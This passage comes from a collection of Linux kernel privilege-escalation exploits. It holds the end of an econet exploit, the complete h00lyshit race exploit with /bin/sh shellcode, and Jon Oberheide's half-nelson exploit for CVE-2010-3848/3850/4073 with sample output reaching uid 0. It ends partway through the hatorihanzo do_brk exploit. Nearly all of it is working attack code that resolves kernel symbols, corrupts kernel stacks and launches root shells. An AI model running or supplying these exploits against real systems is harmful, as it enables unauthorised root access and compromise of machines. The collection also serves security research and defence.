= get_kernel_sym("econet_ops"); 229 | commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); 230 | prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred"); 231 | 232 | if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) { 233 | printf("[*] Failed to resolve kernel symbols.\n"); 234 | return -1; 235 | } 236 | 237 | if(!(newstack = malloc(65536))) { 238 | printf("[*] Failed to allocate memory.\n"); 239 | return -1; 240 | } 241 | 242 | printf("[*] Calculating target...\n"); 243 | target = econet_ops + 10 * sizeof(void *) - OFFSET; 244 | 245 | /* Clear the higher bits */ 246 | landing = econet_ioctl << SHIFT >> SHIFT; 247 | 248 | payload = mmap((void *)(landing & ~0xfff), 2 * 4096, 249 | PROT_READ | PROT_WRITE | PROT_EXEC, 250 | MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); 251 | 252 | if ((long)payload == -1) { 253 | printf("[*] Failed to mmap() at target address.\n"); 254 | return -1; 255 | } 256 | 257 | memcpy((void *)landing, &trampoline, 1024); 258 | 259 | clone((int (*)(void *))trigger, 260 | (void *)((unsigned long)newstack + 65536), 261 | CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD, 262 | &fildes, NULL, NULL, target); 263 | 264 | sleep(1); 265 | 266 | printf("[*] Triggering payload...\n"); 267 | ioctl(fildes[2], 0, NULL); 268 | 269 | if(getuid()) { 270 | printf("[*] Exploit failed to get root.\n"); 271 | return -1; 272 | } 273 | 274 | printf("[*] Got root!\n"); 275 | execl("/bin/sh", "/bin/sh", NULL); 276 | } -------------------------------------------------------------------------------- /h00lyshit.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** Author: h00lyshit 3 | ** Vulnerable: Linux 2.6 ALL 4 | ** Type of Vulnerability: Local Race 5 | ** Tested On : various distros 6 | ** Vendor Status: unknown 7 | ** 8 | ** Disclaimer: 9 | ** In no event shall the author be liable for any damages 10 | ** whatsoever arising out of or in connection with the use 11 | ** or spread of this information. 12 | ** Any use of this information is at the user's own risk. 13 | ** 14 | ** Compile: 15 | ** gcc h00lyshit.c -o h00lyshit 16 | ** 17 | ** Usage: 18 | ** h00lyshit 19 | ** 20 | ** Example: 21 | ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 22 | ** 23 | ** if y0u dont have one, make big file (~100MB) in /tmp with dd 24 | ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null 25 | ** 26 | */ 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | 43 | 44 | static struct exec ex; 45 | static char *e[256]; 46 | static char *a[4]; 47 | static char b[512]; 48 | static char t[256]; 49 | static volatile int *c; 50 | 51 | 52 | /* h00lyshit shell code */ 53 | __asm__ (" __excode: call 1f \n" 54 | " 1: mov $23, %eax \n" 55 | " xor %ebx, %ebx \n" 56 | " int $0x80 \n" 57 | " pop %eax \n" 58 | " mov $cmd-1b, %ebx \n" 59 | " add %eax, %ebx \n" 60 | " mov $arg-1b, %ecx \n" 61 | " add %eax, %ecx \n" 62 | " mov %ebx, (%ecx) \n" 63 | " mov %ecx, %edx \n" 64 | " add $4, %edx \n" 65 | " mov $11, %eax \n" 66 | " int $0x80 \n" 67 | " mov $1, %eax \n" 68 | " int $0x80 \n" 69 | " arg: .quad 0x00, 0x00 \n" 70 | " cmd: .string \"/bin/sh\" \n" 71 | " __excode_e: nop \n" 72 | " .global __excode \n" 73 | " .global __excode_e \n" 74 | ); 75 | 76 | 77 | 78 | extern void (*__excode) (void); 79 | extern void (*__excode_e) (void); 80 | 81 | 82 | void 83 | error (char *err) 84 | { 85 | perror (err); 86 | fflush (stderr); 87 | exit (1); 88 | } 89 | 90 | 91 | /* exploit this shit */ 92 | void 93 | exploit (char *file) 94 | { 95 | int i, fd; 96 | void *p; 97 | struct stat st; 98 | 99 | printf ("\ntrying to exploit %s\n\n", file); 100 | fflush (stdout); 101 | chmod ("/proc/self/environ", 04755); 102 | c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); 103 | memset ((void *) c, 0, 4096); 104 | 105 | /* slow down machine */ 106 | fd = open (file, O_RDONLY); 107 | fstat (fd, &st); 108 | p = 109 | (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); 110 | if (p == MAP_FAILED) 111 | error ("mmap"); 112 | prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); 113 | sprintf (t, "/proc/%d/environ", getpid ()); 114 | sched_yield (); 115 | execve (NULL, a, e); 116 | madvise (0, 0, MADV_WILLNEED); 117 | i = fork (); 118 | 119 | /* give it a try */ 120 | if (i) 121 | { 122 | (*c)++; 123 | !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise"); 124 | prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); 125 | sched_yield (); 126 | } 127 | else 128 | { 129 | nice(10); 130 | while (!(*c)); 131 | sched_yield (); 132 | execve (t, a, e); 133 | error ("failed"); 134 | } 135 | 136 | waitpid (i, NULL, 0); 137 | exit (0); 138 | } 139 | 140 | 141 | int 142 | main (int ac, char **av) 143 | { 144 | int i, j, k, s; 145 | char *p; 146 | 147 | memset (e, 0, sizeof (e)); 148 | memset (a, 0, sizeof (a)); 149 | a[0] = strdup (av[0]); 150 | a[1] = strdup (av[0]); 151 | a[2] = strdup (av[1]); 152 | 153 | if (ac < 2) 154 | error ("usage: binary "); 155 | if (ac > 2) 156 | exploit (av[2]); 157 | printf ("\npreparing"); 158 | fflush (stdout); 159 | 160 | /* make setuid a.out */ 161 | memset (&ex, 0, sizeof (ex)); 162 | N_SET_MAGIC (ex, NMAGIC); 163 | N_SET_MACHTYPE (ex, M_386); 164 | s = ((unsigned) &__excode_e) - (unsigned) &__excode; 165 | ex.a_text = s; 166 | ex.a_syms = -(s + sizeof (ex)); 167 | 168 | memset (b, 0, sizeof (b)); 169 | memcpy (b, &ex, sizeof (ex)); 170 | memcpy (b + sizeof (ex), &__excode, s); 171 | 172 | /* make environment */ 173 | p = b; 174 | s += sizeof (ex); 175 | j = 0; 176 | for (i = k = 0; i < s; i++) 177 | { 178 | if (!p[i]) 179 | { 180 | e[j++] = &p[k]; 181 | k = i + 1; 182 | } 183 | } 184 | 185 | /* reexec */ 186 | getcwd (t, sizeof (t)); 187 | strcat (t, "/"); 188 | strcat (t, av[0]); 189 | execve (t, a, e); 190 | error ("execve"); 191 | return 0; 192 | } 193 | 194 | -------------------------------------------------------------------------------- /h00lyshit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/h00lyshit.zip -------------------------------------------------------------------------------- /half-nelson.c: -------------------------------------------------------------------------------- 1 | /* 2 | * half-nelson.c 3 | * 4 | * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit 5 | * Jon Oberheide 6 | * http://jon.oberheide.org 7 | * 8 | * Information: 9 | * 10 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848 11 | * 12 | * Stack-based buffer overflow in the econet_sendmsg function in 13 | * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an 14 | * econet address is configured, allows local users to gain privileges by 15 | * providing a large number of iovec structures. 16 | * 17 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850 18 | * 19 | * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel 20 | * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which 21 | * allows local users to bypass intended access restrictions and configure 22 | * econet addresses via an SIOCSIFADDR ioctl call. 23 | * 24 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073 25 | * 26 | * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not 27 | * initialize certain structures, which allows local users to obtain 28 | * potentially sensitive information from kernel stack memory. 29 | * 30 | * Usage: 31 | * 32 | * $ gcc half-nelson.c -o half-nelson -lrt 33 | * $ ./half-nelson 34 | * [+] looking for symbols... 35 | * [+] resolved symbol commit_creds to 0xffffffff81088ad0 36 | * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0 37 | * [+] resolved symbol ia32_sysret to 0xffffffff81046692 38 | * [+] spawning children to achieve adjacent kstacks... 39 | * [+] found parent kstack at 0xffff88001c6ca000 40 | * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000 41 | * [+] lower child spawning a helper... 42 | * [+] lower child calling compat_sys_wait4 on helper... 43 | * [+] helper going to sleep... 44 | * [+] upper child triggering stack overflow... 45 | * [+] helper woke up 46 | * [+] lower child returned from compat_sys_wait4 47 | * [+] parent's restart_block has been clobbered 48 | * [+] escalating privileges... 49 | * [+] launching root shell! 50 | * # id 51 | * uid=0(root) gid=0(root) 52 | * 53 | * Notes: 54 | * 55 | * This exploit leverages three vulnerabilities to escalate privileges. 56 | * The primary vulnerability is a kernel stack overflow, not a stack buffer 57 | * overflow as the CVE description incorrectly states. I believe this is the 58 | * first public exploit for a kernel stack overflow, and it turns out to be 59 | * a bit tricky due to some particulars of the econet vulnerability. A full 60 | * breakdown of the exploit is forthcoming. 61 | * 62 | * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic). 63 | * 64 | * Greets to pipacs, kees, redpig, taviso, bliss, nelhage, spender, twiz, and rocky. 65 | */ 66 | 67 | #include 68 | #include 69 | #include 70 | #include 71 | #include 72 | #include 73 | #include 74 | #include 75 | #include 76 | #include 77 | #include 78 | #include 79 | #include 80 | #include 81 | #include 82 | #include 83 | #include 84 | #include 85 | #include 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | 92 | #define IOVS 446 93 | #define NPROC 1024 94 | #define KSTACK_SIZE 8192 95 | 96 | #define KSTACK_UNINIT 0 97 | #define KSTACK_UPPER 1 98 | #define KSTACK_LOWER 2 99 | #define KSTACK_DIE 3 100 | #define KSTACK_PARENT 4 101 | #define KSTACK_CLOBBER 5 102 | 103 | #define LEAK_BASE 0xffff880000000000 104 | #define LEAK_TOP 0xffff8800c0000000 105 | #define LEAK_DEPTH 500 106 | #define LEAK_OFFSET 32 107 | 108 | #define NR_IPC 0x75 109 | #define NR_WAIT4 0x72 110 | #define SEMCTL 0x3 111 | 112 | #ifndef PF_ECONET 113 | #define PF_ECONET 19 114 | #endif 115 | 116 | #define STACK_OFFSET 6 117 | #define RESTART_OFFSET 40 118 | 119 | struct ec_addr { 120 | unsigned char station; 121 | unsigned char net; 122 | }; 123 | 124 | struct sockaddr_ec { 125 | unsigned short sec_family; 126 | unsigned char port; 127 | unsigned char cb; 128 | unsigned char type; 129 | struct ec_addr addr; 130 | unsigned long cookie; 131 | }; 132 | 133 | struct ipc64_perm { 134 | uint32_t key; 135 | uint32_t uid; 136 | uint32_t gid; 137 | uint32_t cuid; 138 | uint32_t cgid; 139 | uint32_t mode; 140 | uint16_t seq; 141 | uint16_t __pad2; 142 | unsigned long __unused1; 143 | unsigned long __unused2; 144 | }; 145 | 146 | struct semid64_ds { 147 | struct ipc64_perm sem_perm; 148 | unsigned long sem_otime; 149 | unsigned long __unused1; 150 | unsigned long sem_ctime; 151 | unsigned long __unused; 152 | unsigned long sem_nsems; 153 | unsigned long __unused3; 154 | unsigned long __unused4; 155 | }; 156 | 157 | union semun { 158 | int val; 159 | struct semid_ds *buf; 160 | unsigned short *array; 161 | struct seminfo *__buf; 162 | }; 163 | 164 | struct region { 165 | unsigned long parent; 166 | unsigned long addrs[NPROC]; 167 | }; 168 | struct region *region; 169 | 170 | typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 171 | typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 172 | _commit_creds commit_creds; 173 | _prepare_kernel_cred prepare_kernel_cred; 174 | unsigned long ia32_sysret; 175 | 176 | void __attribute__((regparm(3))) 177 | kernel_code(void) 178 | { 179 | commit_creds(prepare_kernel_cred(0)); 180 | } 181 | 182 | void 183 | payload_parent(void) 184 | { 185 | asm volatile ( 186 | "mov $kernel_code, %rax\n" 187 | "call *%rax\n" 188 | ); 189 | } 190 | 191 | void 192 | payload_child(void) 193 | { 194 | asm volatile ( 195 | "movq $payload_parent, (%0)\n" 196 | "jmpq *%1\n" 197 | : 198 | : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret) 199 | ); 200 | } 201 | 202 | unsigned long 203 | get_kstack(void) 204 | { 205 | int i, size, offset; 206 | union semun *arg; 207 | struct semid_ds dummy; 208 | struct semid64_ds *leaked; 209 | char *stack_start, *stack_end; 210 | unsigned char *p; 211 | unsigned long kstack, *ptr; 212 | 213 | /* make sure our argument is 32-bit accessible */ 214 | arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0); 215 | if (arg == MAP_FAILED) { 216 | printf("[-] failure mapping memory, aborting!\n"); 217 | exit(1); 218 | } 219 | 220 | /* map a fake stack to use during syscall */ 221 | stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0); 222 | if (stack_start == MAP_FAILED) { 223 | printf("[-] failure mapping memory, aborting!\n"); 224 | exit(1); 225 | } 226 | stack_end = stack_start + 4096; 227 | 228 | memset(arg, 0, sizeof(union semun)); 229 | memset(&dummy, 0, sizeof(struct semid_ds)); 230 | arg->buf = &dummy; 231 | 232 | /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */ 233 | asm volatile ( 234 | "push %%rax\n" 235 | "push %%rbx\n" 236 | "push %%rcx\n" 237 | "push %%rdx\n" 238 | "push %%rsi\n" 239 | "push %%rdi\n" 240 | "movl %0, %%eax\n" 241 | "movl %1, %%ebx\n" 242 | "movl %2, %%ecx\n" 243 | "movl %3, %%edx\n" 244 | "movl %4, %%esi\n" 245 | "movq %5, %%rdi\n" 246 | "movq %%rsp, %%r8\n" 247 | "movq %6, %%rsp\n" 248 | "push %%r8\n" 249 | "int $0x80\n" 250 | "pop %%r8\n" 251 | "movq %%r8, %%rsp\n" 252 | "pop %%rdi\n" 253 | "pop %%rsi\n" 254 | "pop %%rdx\n" 255 | "pop %%rcx\n" 256 | "pop %%rbx\n" 257 | "pop %%rax\n" 258 | : 259 | : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end) 260 | : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8" 261 | ); 262 | 263 | /* naively extract a pointer to the kstack from the kstack */ 264 | p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET; 265 | kstack = *(unsigned long *) p; 266 | 267 | if (kstack < LEAK_BASE || kstack > LEAK_TOP) { 268 | printf("[-] failed to leak a suitable kstack address, try again!\n"); 269 | exit(1); 270 | } 271 | if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) { 272 | printf("[-] failed to leak a suitable kstack address, try again!\n"); 273 | exit(1); 274 | } 275 | 276 | kstack = kstack & ~0x1fff; 277 | 278 | return kstack; 279 | } 280 | 281 | unsigned long 282 | get_symbol(char *name) 283 | { 284 | FILE *f; 285 | unsigned long addr; 286 | char dummy, sym[512]; 287 | int ret = 0; 288 | 289 | f = fopen("/proc/kallsyms", "r"); 290 | if (!f) { 291 | return 0; 292 | } 293 | 294 | while (ret != EOF) { 295 | ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); 296 | if (ret == 0) { 297 | fscanf(f, "%s\n", sym); 298 | continue; 299 | } 300 | if (!strcmp(name, sym)) { 301 | printf("[+] resolved symbol %s to %p\n", name, (void *) addr); 302 | fclose(f); 303 | return addr; 304 | } 305 | } 306 | fclose(f); 307 | 308 | return 0; 309 | } 310 | 311 | int 312 | get_adjacent_kstacks(void) 313 | { 314 | int i, ret, shm, pid, type; 315 | 316 | /* create shared communication channel between parent and its children */ 317 | shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); 318 | if (shm < 0) { 319 | printf("[-] failed creating shared memory, aborting!\n"); 320 | exit(1); 321 | } 322 | 323 | ret = ftruncate(shm, sizeof(struct region)); 324 | if (ret != 0) { 325 | printf("[-] failed resizing shared memory, aborting!\n"); 326 | exit(1); 327 | } 328 | 329 | region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0); 330 | memset(region, KSTACK_UNINIT, sizeof(struct region)); 331 | 332 | /* parent kstack self-discovery */ 333 | region->parent = get_kstack(); 334 | 335 | printf("[+] found parent kstack at 0x%lx\n", region->parent); 336 | 337 | /* fork and discover children with adjacently-allocated kernel stacks */ 338 | for (i = 0; i < NPROC; ++i) { 339 | pid = fork(); 340 | 341 | if (pid > 0) { 342 | type = KSTACK_PARENT; 343 | continue; 344 | } else if (pid == 0) { 345 | /* children do kstack self-discovery */ 346 | region->addrs[i] = get_kstack(); 347 | 348 | /* children sleep until parent has found adjacent children */ 349 | while (1) { 350 | sleep(1); 351 | if (region->addrs[i] == KSTACK_DIE) { 352 | /* parent doesn't need us :-( */ 353 | exit(0); 354 | } else if (region->addrs[i] == KSTACK_UPPER) { 355 | /* we're the upper adjacent process */ 356 | type = KSTACK_UPPER; 357 | break; 358 | } else if (region->addrs[i] == KSTACK_LOWER) { 359 | /* we're the lower adjacent process */ 360 | type = KSTACK_LOWER; 361 | break; 362 | } 363 | } 364 | break; 365 | } else { 366 | printf("[-] fork failed, aborting!\n"); 367 | exit(1); 368 | } 369 | } 370 | 371 | return type; 372 | } 373 | 374 | void 375 | do_parent(void) 376 | { 377 | int i, j, upper, lower; 378 | 379 | /* parent sleeps until we've discovered all the child kstacks */ 380 | while (1) { 381 | sleep(1); 382 | for (i = 0; i < NPROC; ++i) { 383 | if (region->addrs[i] == KSTACK_UNINIT) { 384 | break; 385 | } 386 | } 387 | if (i == NPROC) { 388 | break; 389 | } 390 | } 391 | 392 | /* figure out if we have any adjacent child kstacks */ 393 | for (i = 0; i < NPROC; ++i) { 394 | for (j = 0; j < NPROC; ++j) { 395 | if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) { 396 | break; 397 | } 398 | } 399 | if (j != NPROC) { 400 | break; 401 | } 402 | } 403 | if (i == NPROC && j == NPROC) { 404 | printf("[-] failed to find adjacent kstacks, try again!\n"); 405 | exit(1); 406 | } 407 | 408 | upper = i; 409 | lower = j; 410 | 411 | printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]); 412 | 413 | /* signal to non-adjacent children to die */ 414 | for (i = 0; i < NPROC; ++i) { 415 | if (i != upper && i != lower) { 416 | region->addrs[i] = KSTACK_DIE; 417 | } 418 | } 419 | 420 | /* signal adjacent children to continue on */ 421 | region->addrs[upper] = KSTACK_UPPER; 422 | region->addrs[lower] = KSTACK_LOWER; 423 | 424 | /* parent sleeps until child has clobbered the fptr */ 425 | while (1) { 426 | sleep(1); 427 | if (region->parent == KSTACK_CLOBBER) { 428 | break; 429 | } 430 | } 431 | 432 | printf("[+] escalating privileges...\n"); 433 | 434 | /* trigger our clobbered fptr */ 435 | syscall(__NR_restart_syscall); 436 | 437 | /* our privileges should be escalated now */ 438 | if (getuid() != 0) { 439 | printf("[-] privilege escalation failed, aborting!\n"); 440 | exit(1); 441 | } 442 | 443 | printf("[+] launching root shell!\n"); 444 | 445 | execl("/bin/sh", "/bin/sh", NULL); 446 | } 447 | 448 | void 449 | do_child_upper(void) 450 | { 451 | int i, ret, eco_sock; 452 | struct sockaddr_ec eco_addr; 453 | struct msghdr eco_msg; 454 | struct iovec iovs[IOVS]; 455 | struct ifreq ifr; 456 | char *target; 457 | 458 | /* calculate payload target, skip prologue */ 459 | target = (char *) payload_child; 460 | target += 4; 461 | 462 | /* give lower child a chance to enter its wait4 call */ 463 | sleep(1); 464 | 465 | /* write some zeros */ 466 | for (i = 0; i < STACK_OFFSET; ++i) { 467 | iovs[i].iov_base = (void *) 0x0; 468 | iovs[i].iov_len = 0; 469 | } 470 | 471 | /* overwrite saved ia32_sysret address on stack */ 472 | iovs[STACK_OFFSET].iov_base = (void *) target; 473 | iovs[STACK_OFFSET].iov_len = 0x0246; 474 | 475 | /* force abort via EFAULT */ 476 | for (i = STACK_OFFSET + 1; i < IOVS; ++i) { 477 | iovs[i].iov_base = (void *) 0xffffffff00000000; 478 | iovs[i].iov_len = 0; 479 | } 480 | 481 | /* create econet socket */ 482 | eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0); 483 | if (eco_sock < 0) { 484 | printf("[-] failed creating econet socket, aborting!\n"); 485 | exit(1); 486 | } 487 | 488 | memset(&ifr, 0, sizeof(ifr)); 489 | strcpy(ifr.ifr_name, "lo"); 490 | 491 | /* trick econet into associated with the loopback */ 492 | ret = ioctl(eco_sock, SIOCSIFADDR, &ifr); 493 | if (ret != 0) { 494 | printf("[-] failed setting interface address, aborting!\n"); 495 | exit(1); 496 | } 497 | 498 | memset(&eco_addr, 0, sizeof(eco_addr)); 499 | memset(&eco_msg, 0, sizeof(eco_msg)); 500 | eco_msg.msg_name = &eco_addr; 501 | eco_msg.msg_namelen = sizeof(eco_addr); 502 | eco_msg.msg_flags = 0; 503 | eco_msg.msg_iov = &iovs[0]; 504 | eco_msg.msg_iovlen = IOVS; 505 | 506 | printf("[+] upper child triggering stack overflow...\n"); 507 | 508 | /* trigger the kstack overflow into lower child's kstack */ 509 | ret = sendmsg(eco_sock, &eco_msg, 0); 510 | if (ret != -1 || errno != EFAULT) { 511 | printf("[-] sendmsg succeeded unexpectedly, aborting!\n"); 512 | exit(1); 513 | } 514 | 515 | close(eco_sock); 516 | } 517 | 518 | void 519 | do_child_lower(void) 520 | { 521 | int pid; 522 | 523 | printf("[+] lower child spawning a helper...\n"); 524 | 525 | /* fork off a helper to wait4 on */ 526 | pid = fork(); 527 | if (pid == 0) { 528 | printf("[+] helper going to sleep...\n"); 529 | sleep(5); 530 | printf("[+] helper woke up\n"); 531 | exit(1); 532 | } 533 | 534 | printf("[+] lower child calling compat_sys_wait4 on helper...\n"); 535 | 536 | /* syscall(NR_WAIT4, pid, 0, 0, 0) */ 537 | asm volatile ( 538 | "push %%rax\n" 539 | "push %%rbx\n" 540 | "push %%rcx\n" 541 | "push %%rdx\n" 542 | "push %%rsi\n" 543 | "movl %0, %%eax\n" 544 | "movl %1, %%ebx\n" 545 | "movl %2, %%ecx\n" 546 | "movl %3, %%edx\n" 547 | "movl %4, %%esi\n" 548 | "int $0x80\n" 549 | "pop %%rsi\n" 550 | "pop %%rdx\n" 551 | "pop %%rcx\n" 552 | "pop %%rbx\n" 553 | "pop %%rax\n" 554 | : 555 | : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0) 556 | : "memory", "rax", "rbx", "rcx", "rdx", "rsi" 557 | ); 558 | 559 | printf("[+] lower child returned from compat_sys_wait4\n"); 560 | 561 | printf("[+] parent's restart_block has been clobbered\n"); 562 | 563 | /* signal parent that our fptr should now be clobbered */ 564 | region->parent = KSTACK_CLOBBER; 565 | } 566 | 567 | int 568 | main(int argc, char **argv) 569 | { 570 | int type; 571 | 572 | if (sizeof(unsigned long) != 8) { 573 | printf("[-] x86_64 only, sorry!\n"); 574 | exit(1); 575 | } 576 | 577 | printf("[+] looking for symbols...\n"); 578 | 579 | commit_creds = (_commit_creds) get_symbol("commit_creds"); 580 | if (!commit_creds) { 581 | printf("[-] symbol table not available, aborting!\n"); 582 | exit(1); 583 | } 584 | 585 | prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); 586 | if (!prepare_kernel_cred) { 587 | printf("[-] symbol table not available, aborting!\n"); 588 | exit(1); 589 | } 590 | 591 | ia32_sysret = get_symbol("ia32_sysret"); 592 | if (!ia32_sysret) { 593 | printf("[-] symbol table not available, aborting!\n"); 594 | exit(1); 595 | } 596 | 597 | printf("[+] spawning children to achieve adjacent kstacks...\n"); 598 | 599 | type = get_adjacent_kstacks(); 600 | 601 | if (type == KSTACK_PARENT) { 602 | do_parent(); 603 | } else if (type == KSTACK_UPPER) { 604 | do_child_upper(); 605 | } else if (type == KSTACK_LOWER) { 606 | do_child_lower(); 607 | } 608 | 609 | return 0; 610 | } -------------------------------------------------------------------------------- /hatorihanzo.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hatorihanzo.c 3 | * Linux kernel do_brk vma overflow exploit. 4 | * 5 | * The bug was found by Paul (IhaQueR) Starzetz 6 | * 7 | * Further research and exploit development by 8 | * Wojciech Purczynski and Paul Starzetz. 9 | * 10 | * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved. 11 | * 12 | * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE 13 | * OF PRESENTED CODE IS STRICTLY PROHIBITED. 14 | */ 15 | #define _GNU_SOURCE 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #define kB * 1024 38 | #define MB * 1024 kB 39 | #define GB * 1024 MB 40 | #define MAGIC 0xdefaced /* I should've patented this number -cliph */ 41 | #define ENTRY_MAGIC 0 42 | #define ENTRY_GATE 2 43 | #define ENTRY_CS 4 44 | #define ENTRY_DS 6 45 | #define CS ((ENTRY_CS << 2) | 4) 46 | #define DS ((ENTRY_DS << 2) | 4) 47 | #define GATE ((ENTRY_GATE << 2) | 4 | 3) 48 | #define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE) 49 | #define TOP_ADDR 0xFFFFE000U 50 | /* configuration */ 51 | unsigned task_size; 52 | unsigned page; 53 | uid_t uid; 54 | unsigned address; 55 | int dontexit = 0; 56 | void fatal(char * msg) 57 | { 58 | fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno)); 59 | if (dontexit) { 60 | fprintf(stderr, "[-] Unable to exit, entering neverending loop.\n"); 61 | kill(getpid(), SIGSTOP); 62 | for (;;) pause(); 63 | } 64 | exit(EXIT_FAILURE); 65 | } 66 | void configure(void) 67 | { 68 | unsigned val; 69 | task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB; 70 | uid = getuid(); 71 | } 72 | void expand(void) 73 | { 74 | unsigned top = (unsigned) sbrk(0); 75 | unsigned limit = address + PAGE_SIZE; 76 | do { 77 | if (sbrk(PAGE_SIZE) == NULL) 78 | fatal("Kernel seems not to be vulnerable"); 79 | dontexit = 1; 80 | top += PAGE_SIZE; 81 | } while (top < limit); 82 | } 83 | jmp_buf jmp; 84 | #define MAP_NOPAGE 1 85 | #define MAP_ISPAGE 2 86 | void sigsegv(int signo, siginfo_t * si, void * ptr) 87 | { 88 | struct ucontext * uc = (struct ucontext *) ptr; 89 | int error_code = uc->uc_mcontext.gregs[REG_ERR]; 90 | (void)signo; 91 | (void)si; 92 | error_code = MAP_NOPAGE + (error_code & 1); 93 | longjmp(jmp, error_code); 94 | } 95 | void prepare(void) 96 | { 97 | struct sigaction sa; 98 | sa.sa_sigaction = sigsegv; 99 | sa.sa_flags = SA_SIGINFO | SA_NOMASK; 100 | sigemptyset(&sa.sa_mask); 101 | sigaction(SIGSEGV, &sa, NULL); 102 | } 103 | int testaddr(unsigned addr) 104 | { 105 | int val; 106 | val = setjmp(jmp); 107 | if (val == 0) { 108 | asm ("verr (%%eax)" : : "a" (addr)); 109 | return MAP_ISPAGE; 110 | } 111 | return val; 112 | } 113 | #define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE) 114 | #define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned)) 115 | #define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0) 116 | void map(unsigned * map) 117 | { 118 | unsigned addr = task_size; 119 | unsigned bit = 1; 120 | prepare(); 121 | while (addr < TOP_ADDR) { 122 | if (testaddr(addr) == MAP_ISPAGE) 123 | *map |= bit; 124 | addr += PAGE_SIZE; 125 | next(map, bit); 126 | } 127 | signal(SIGSEGV, SIG_DFL); 128 | } 129 | void find(unsigned * m) 130 | { 131 | unsigned addr = task_size; 132 | unsigned bit = 1; 133 | unsigned count; 134 | unsigned tmp; 135 | prepare(); 136 | tmp = address = count = 0U; 137 | while (addr < TOP_ADDR) { 138 | int val = testaddr(addr); 139 | if (val == MAP_ISPAGE && (*m & bit) == 0) { 140 | if (!tmp) tmp = addr; 141 | count++; 142 | } else { 143 | if (tmp && count == LDT_PAGES) { 144 | errno = EAGAIN; 145 | if (address) 146 | fatal("double allocation\n"); 147 | address = tmp; 148 | } 149 | tmp = count = 0U; 150 | } 151 | addr += PAGE_SIZE; 152 | next(m, bit); 153 | } 154 | signal(SIGSEGV, SIG_DFL); 155 | if (address) 156 | return; 157 | errno = ENOTSUP; 158 | fatal("Unable to determine kernel address"); 159 | } 160 | int modify_ldt(int, void *, unsigned); 161 | void ldt(unsigned * m) 162 | { 163 | struct modify_ldt_ldt_s l; 164 | map(m); 165 | memset(&l, 0, sizeof(l)); 166 | l.entry_number = LDT_ENTRIES - 1; 167 | l.seg_32bit = 1; 168 | l.base_addr = MAGIC >> 16; 169 | l.limit = MAGIC & 0xffff; 170 | if (modify_ldt(1, &l, sizeof(l)) == -1) 171 | fatal("Unable to set up LDT"); 172 | l.entry_number = ENTRY_MAGIC / 2; 173 